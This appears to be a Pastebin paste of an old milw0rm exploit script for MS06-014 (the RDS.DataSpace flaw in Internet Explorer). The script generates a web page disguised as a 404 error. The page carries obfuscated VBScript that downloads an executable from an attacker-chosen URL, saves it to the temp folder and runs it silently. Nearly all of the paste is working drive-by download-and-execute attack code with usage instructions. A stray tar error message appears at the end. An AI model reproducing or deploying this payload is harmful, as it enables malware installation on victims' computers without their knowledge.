Advertisement
FlyFar

Exploit.Python.Psyme.a - Source Code

Jun 12th, 2023
763
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 3.13 KB | Cybersecurity | 0 0
  1. #!/bin/sh -
  2. "exec" "python" "-O" "$0" "$@"
  3.  
  4. __doc__ = """[BL4CK] - MS06-014
  5.  
  6. RDS.DataStore - Data Execution
  7. CVS-2006-0003
  8. MS06-014
  9.  
  10. April 2006
  11.  
  12. *** This is a bit outdated, but it works very well ***
  13.  
  14. Usage: ./bl4ck_ms06_014.py http://omfg.what.ho.st/~user/stage2.exe index.html
  15.  
  16. Now upload index.html to the same web server hosting your
  17. http://omfg.what.ho.st/~user/stage2.exe
  18.  
  19.                            - redsand@blacksecurity.org
  20. """
  21.  
  22. __version__ = "1.0"
  23.  
  24. import sys, random
  25.  
  26. class MS06014:
  27.    
  28.     __version = "'[BL4CK] MS06-014 " + __version__ + "\r\n"
  29.  
  30.  
  31.     __html = """
  32.    <title></title>
  33.    <head></head>
  34.  
  35.    <body>
  36.  
  37.    <script language="VBScript">
  38.  
  39.    on error resume next
  40.  
  41.    BL4CK_PAYLOAD
  42.  
  43.    </script>
  44.    <head>
  45.    <title>[BL4CK] || 404 Not Found</title>
  46.    </head><body>
  47.    <h1>Not Found</h1>
  48.    pwn3d!!
  49.    <hr>
  50.    <!-- <script>location.href='http://google.com'</script> -->
  51.    </body>
  52.  
  53.    </html>
  54.  
  55.    """
  56.  
  57.     __payload = """
  58.  
  59.    ' due to how ajax works, the file MUST be within the same local domain
  60.    dl = "URLFILE"
  61.  
  62.    ' create adodbstream object
  63.    Set df = document.createElement("object")
  64.    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
  65.    str="Microsoft.XMLHTTP"
  66.    Set x = df.CreateObject(str,"")
  67.  
  68.    a1="Ado"
  69.    a2="db."
  70.    a3="Str"
  71.    a4="eam"
  72.    str1=a1&a2&a3&a4
  73.    str5=str1
  74.    set S = df.createobject(str5,"")
  75.    S.type = 1
  76.  
  77.    ' xml ajax req
  78.    str6="GET"
  79.    x.Open str6, dl, False
  80.    x.Send
  81.  
  82.    ' Get temp directory and create our destination name
  83.    fname1="bl4ck.com"
  84.    set F = df.createobject("Scripting.FileSystemObject","")
  85.    set tmp = F.GetSpecialFolder(2) ' Get tmp folder
  86.    fname1= F.BuildPath(tmp,fname1)
  87.    S.open
  88.    ' open adodb stream and write contents of request to file
  89.    ' like vbs dl+exec code
  90.    S.write x.responseBody
  91.    ' Saves it with CreateOverwrite flag
  92.    S.savetofile fname1,2
  93.  
  94.    S.close
  95.    set Q = df.createobject("Shell.Application","")
  96.    Q.ShellExecute fname1,"","","open",0
  97.  
  98.    """
  99.  
  100.     def __init__(self, file):
  101.  
  102.     self.__file = file
  103.  
  104.  
  105.  
  106.     def bl4ck(self):
  107.     self.__payload = self.__payload.replace("URLFILE",self.__file)
  108.  
  109.     encoded = self.__payload
  110.  
  111.     ret = self.__html.replace("BL4CK_PAYLOAD",encoded)
  112.  
  113.     return ret
  114.  
  115.  
  116. if __name__ == '__main__':
  117.  
  118.     url=False
  119.     out=False
  120.  
  121.     print "[BL4CK] MS06-014 - redsand@blacksecurity.org"
  122.     print "URL path to the file must be on the same domain as the HTM file"
  123.     print "http://blacksecurity.org\r\n"
  124.  
  125.  
  126.     argc = len(sys.argv)
  127.     if(argc <= 2):
  128.             print "USAGE: %s <download url> <outfile>" % sys.argv[0]
  129.             sys.exit(0)
  130.     if(argc > 1):
  131.             url = sys.argv[1]
  132.     if(argc > 2):
  133.             out = sys.argv[2]
  134.  
  135.         ms = MS06014(url)
  136.  
  137.         ret = ms.bl4ck()
  138.  
  139.  
  140.     try:
  141.         fsock = open(out, "w+", 0)
  142.         try:
  143.             fsock.write(ret );
  144.         finally:
  145.             fsock.close()
  146.     except IOError:
  147.         pass
  148.  
  149.     print "Wrote %r bytes to: %s" % (len(ret),out)
  150.  
  151. # milw0rm.com [2006-07-21]
  152. /bin/tar: Skipping to the next header
  153. /bin/tar: Error exit delayed from previous errors
Tags: Exploit BASH
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement